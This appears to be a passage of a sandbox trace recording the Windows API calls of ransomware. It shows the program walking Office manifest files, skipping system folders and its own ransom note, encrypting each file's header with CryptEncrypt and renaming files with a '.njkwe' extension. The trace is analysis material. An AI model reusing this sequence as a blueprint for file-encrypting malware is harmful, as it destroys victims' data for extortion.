[0070.575] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.576] GetProcessHeap () returned 0xbe0000 [0070.576] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.576] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed20b499, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed20b499, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd3783951, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x17984, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.outlookmui.msi.16.en-us.xml", cAlternateFileName="C2C4E2~1.XML")) returned 1 [0070.576] lstrcmpiW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2="Windows") returned -1 [0070.576] lstrcmpiW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0070.576] lstrcmpiW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0070.576] lstrcmpiW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0070.576] lstrcmpiW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0070.576] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml") returned 118 [0070.576] StrStrIW (lpFirst="C2RManifest.outlookmui.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0070.576] lstrcmpW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.576] lstrcmpW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2="taridd") returned -1 [0070.576] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.1", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.576] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.577] GetTickCount () returned 0x1152046 [0070.577] GetTickCount () returned 0x1152046 [0070.577] GetTickCount () returned 0x1152046 [0070.577] GetTickCount () returned 0x1152046 [0070.577] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.577] GetProcessHeap () returned 0xbe0000 [0070.577] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0070.577] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.579] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.579] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.579] GetProcessHeap () returned 0xbe0000 [0070.579] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0070.579] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.579] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.580] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.580] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.580] CloseHandle (hObject=0x434) returned 1 [0070.580] GetProcessHeap () returned 0xbe0000 [0070.580] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.580] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 138 [0070.580] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.581] GetProcessHeap () returned 0xbe0000 [0070.581] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.581] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed1e5243, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed1e5243, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd27de170, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xafddc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", cAlternateFileName="C280EB~1.XML")) returned 1 [0070.581] lstrcmpiW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2="Windows") returned -1 [0070.581] lstrcmpiW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2="$Recycle.bin") returned 1 [0070.581] lstrcmpiW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2="System Volume Information") returned -1 [0070.581] lstrcmpiW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2="Program Files") returned -1 [0070.581] lstrcmpiW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2="Program Files (x86)") returned -1 [0070.581] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml") returned 137 [0070.581] StrStrIW (lpFirst="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpSrch=".njkwe") returned 0x0 [0070.581] lstrcmpW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.581] lstrcmpW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2="taridd") returned -1 [0070.581] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.Power", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.581] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.582] GetTickCount () returned 0x1152046 [0070.582] GetTickCount () returned 0x1152046 [0070.582] GetTickCount () returned 0x1152046 [0070.582] GetTickCount () returned 0x1152046 [0070.582] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.582] GetProcessHeap () returned 0xbe0000 [0070.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0070.582] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.584] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.584] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.584] GetProcessHeap () returned 0xbe0000 [0070.584] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0070.584] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.584] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.586] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.586] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.586] CloseHandle (hObject=0x434) returned 1 [0070.586] GetProcessHeap () returned 0xbe0000 [0070.586] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.586] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe") returned 157 [0070.587] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.587] GetProcessHeap () returned 0xbe0000 [0070.587] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.587] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed12666a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed12666a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd290f4ec, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x195a4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", cAlternateFileName="C222CA~1.XML")) returned 1 [0070.587] lstrcmpiW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2="Windows") returned -1 [0070.587] lstrcmpiW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2="$Recycle.bin") returned 1 [0070.587] lstrcmpiW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2="System Volume Information") returned -1 [0070.587] lstrcmpiW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2="Program Files") returned -1 [0070.587] lstrcmpiW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2="Program Files (x86)") returned -1 [0070.587] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml") returned 137 [0070.587] StrStrIW (lpFirst="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpSrch=".njkwe") returned 0x0 [0070.587] lstrcmpW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.587] lstrcmpW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2="taridd") returned -1 [0070.587] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.Power", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.587] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.588] GetTickCount () returned 0x1152046 [0070.588] GetTickCount () returned 0x1152046 [0070.588] GetTickCount () returned 0x1152046 [0070.588] GetTickCount () returned 0x1152046 [0070.588] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.588] GetProcessHeap () returned 0xbe0000 [0070.588] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0070.588] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.603] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.603] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.603] GetProcessHeap () returned 0xbe0000 [0070.603] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0070.603] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.604] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.604] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.604] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.604] CloseHandle (hObject=0x434) returned 1 [0070.604] GetProcessHeap () returned 0xbe0000 [0070.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.604] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe") returned 157 [0070.604] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.605] GetProcessHeap () returned 0xbe0000 [0070.605] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.605] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed0da264, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed0da264, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd35dffce, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x689e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.powerpointmui.msi.16.en-us.xml", cAlternateFileName="C27FF4~1.XML")) returned 1 [0070.605] lstrcmpiW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2="Windows") returned -1 [0070.605] lstrcmpiW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0070.605] lstrcmpiW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0070.605] lstrcmpiW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0070.605] lstrcmpiW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0070.605] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml") returned 121 [0070.605] StrStrIW (lpFirst="C2RManifest.powerpointmui.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0070.605] lstrcmpW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.605] lstrcmpW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2="taridd") returned -1 [0070.605] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.ms", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.606] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.606] GetTickCount () returned 0x1152065 [0070.606] GetTickCount () returned 0x1152065 [0070.606] GetTickCount () returned 0x1152065 [0070.606] GetTickCount () returned 0x1152065 [0070.606] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.606] GetProcessHeap () returned 0xbe0000 [0070.606] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0070.606] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.608] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.608] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.609] GetProcessHeap () returned 0xbe0000 [0070.609] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0070.609] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.609] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.609] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.609] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.609] CloseHandle (hObject=0x434) returned 1 [0070.609] GetProcessHeap () returned 0xbe0000 [0070.609] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.609] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 141 [0070.609] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" (normalized: 